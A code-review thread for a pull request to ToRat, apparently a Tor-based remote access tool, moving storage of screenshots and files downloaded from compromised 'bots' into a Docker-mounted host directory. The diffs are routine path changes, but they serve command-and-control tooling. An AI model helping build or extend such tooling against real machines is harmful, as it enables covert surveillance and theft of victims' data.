### PR TITLE
Share Docker file system with host

### PR DESCRIPTION
**Pull request by JustinTimperio**
This may be the single most helpful QOL PR's I have sent you. I have moved `ToRat.db` and `/bots` to `/dist_ext` for access on the docker bind that happens with `-v "$(pwd)"/dist:/dist_ext`. This means that the host has direct access to not only all the downloads and screenshots taken from clients but also means the SQL DB can be saved easily for transfer to new containers. (Fixes issue #204)

Very excited about this one in terms of improving useability

### CODE REVIEW

File: torat_server/client_ishell.go [hunk 1]
```diff
@@ -218,7 +218,17 @@ func (client *activeClient) Screen(c *ishell.Context) {
 		return
 	}
 
-	err := ioutil.WriteFile(filepath.Join(client.Client.Path, filename), r, 0600)
+	dlPath := filepath.Join("/dist_ext/bots/", client.Client.Hostname, "/screenshots/", filename)
+	dlDir, _ := filepath.Split(dlPath)
+
+	if err := os.MkdirAll(dlDir, os.ModePerm); err != nil {
+		c.ProgressBar().Final(green("[Server] ") + red("[!] Could not create screenshots path!"))
```
Comment (lu4p) [inline torat_server/client_ishell.go:225]: c.ProgressBar().Final(green("[Server] ") + red("[!] Could not create screenshots path:", err))

File: torat_server/client_ishell.go [hunk 2]
```diff
@@ -260,7 +270,9 @@ func (client *activeClient) Speedtest(c *ishell.Context) {
 
 	r := shared.Speedtest{}
 	if err := client.RPC.Call("API.Speedtest", void, &r); err != nil {
-		c.ProgressBar().Final(yellow("["+client.Client.Name+"] ") + red("[!] Could not perform speedtest on client:", err))
```
Comment (lu4p) [inline torat_server/client_ishell.go:263]: Revert this line

**Review by lu4p — CHANGES_REQUESTED** [review]

File: torat_server/client_ishell.go [hunk 3]
```diff
@@ -153,7 +153,7 @@ func (client *activeClient) Download(c *ishell.Context) {
 		return
 	}
 
-	dlPath := filepath.Join("/ToRat/cmd/server/bots/", client.Client.Hostname, r.Fpath)
+	dlPath := filepath.Join("/dist_ext/bots/", client.Client.Hostname, r.Fpath)
```
[the remark this answers is not in the document]
Comment (JustinTimperio) [reply torat_server/client_ishell.go:156]: I think this is my fault actually. Not a huge change but I def see the benefit

File: torat_server/client_ishell.go (hunk 1 above)
Comment (JustinTimperio) [reply torat_server/client_ishell.go:225]: Let's save this for my major patch where we change all these. There are like ~25 instances of this

File: torat_server/client_ishell.go (hunk 2 above)
Comment (JustinTimperio) [reply torat_server/client_ishell.go:263]: This is the same as a few other comments you have left. Again let's leave this for a patch where we fix all these. I would rather change everything at once.

File: torat_server/server.go [hunk 4]
```diff
@@ -87,8 +87,8 @@ func accept(conn net.Conn) {
 
 	db.FirstOrCreate(&c.Client, Client{Hostname: c.Hostname})
 
-	if _, err := os.Stat(c.Client.Path); err != nil {
-		os.MkdirAll(c.Client.Path, os.ModePerm)
+	if _, err := os.Stat("/dist_ext/bots/" + c.Hostname); err != nil {
```
[the remark this answers is not in the document]
Comment (JustinTimperio) [reply torat_server/server.go:90]: agreed, this should be `if _, err := os.Stat("/dist_ext/" + c.Client.Path); err != nil {`

[the remark this answers is not in the document]
Comment (JustinTimperio) [reply torat_server/server.go:90]: Oh wait I see what you mean, you want to change the ABS path of `c.Client.Path` to `/dist_ext/bots/<UUID>`. I'm not sure that will work. I think `c.Client.Path` uses the `cwd` so we need to hard path this. Let me look into this

File: torat_server/client_ishell.go (hunk 1 above)
Comment (lu4p) [reply torat_server/client_ishell.go:225]: ok

File: torat_server/server.go (hunk 4 above)
[the remark this answers is not in the document]
Comment (JustinTimperio) [reply torat_server/server.go:90]: So turns out I was wrong (typical XD). Turns out `c.Client.Path` can be an ABS.
I've fixed this, good call

**Review by lu4p — APPROVED** [review]

**Pull request merged**